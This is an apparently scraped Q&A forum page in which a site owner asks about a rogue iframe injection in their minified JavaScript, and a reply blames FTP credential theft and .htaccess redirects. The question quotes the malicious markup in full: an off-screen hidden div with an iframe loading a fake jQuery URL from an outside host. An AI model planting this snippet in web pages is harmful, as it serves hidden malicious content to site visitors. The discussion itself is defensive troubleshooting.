Ping a Specific Port

Question

Greatestswordsman

Asked: 2013-04-18 15:04:48 +0800 CST2013-04-18 15:04:48 +0800 CST 2013-04-18 15:04:48 +0800 CST

Rogue iframe injection in my javascript

772

I ran my website through Sucuri http://sitecheck.sucuri.net/results/www.fort-aspenwood.com

They came up with these rogue iframes in my minified javascript

<style>.vpqfm { position:absolute; left:-632px; top:-729px; }</style> <div class="vpqfm"><iframe src="http://dhypzebl.serveusers.com/jquery/get.php?ver=jquery.latest.js" width="458" height="424"></iframe></div>

I've searched everywhere and can't seem to find which javascript file thare are in, nor are there any strange php codes in the index or anywhere else.

Any thoughts?

1 Answers

Voted

Matt · Answer 1 · 2013-04-19T05:21:11+08:00

Matt

2013-04-19T05:21:11+08:002013-04-19T05:21:11+08:00

Check htaccess in all directories of your site. It is very common for automated scripts to steal FTP credentials and update .htaccess to redirect an asset (such as JS) to a server that serves your original content plus a payload.

They are pretty good at hiding this: it will set a cookie and only redirect each user once and target specific OS/Browser types, which makes it pretty unnoticable.

0

Rogue iframe injection in my javascript

Can you pass user/pass for HTTP Basic Authentication in URL parameters?

Ping a Specific Port

Check if port is open or closed on a Linux server?

How to automate SSH login with password?

How do I tell Git for Windows where to find my private RSA key?

What's the default superuser username/password for postgres after a new install?

What port does SFTP use?

Command line to list users in a Windows Active Directory group?

What is a Pem file and how does it differ from other OpenSSL Generated Key File Formats?

How to determine if a bash variable is empty?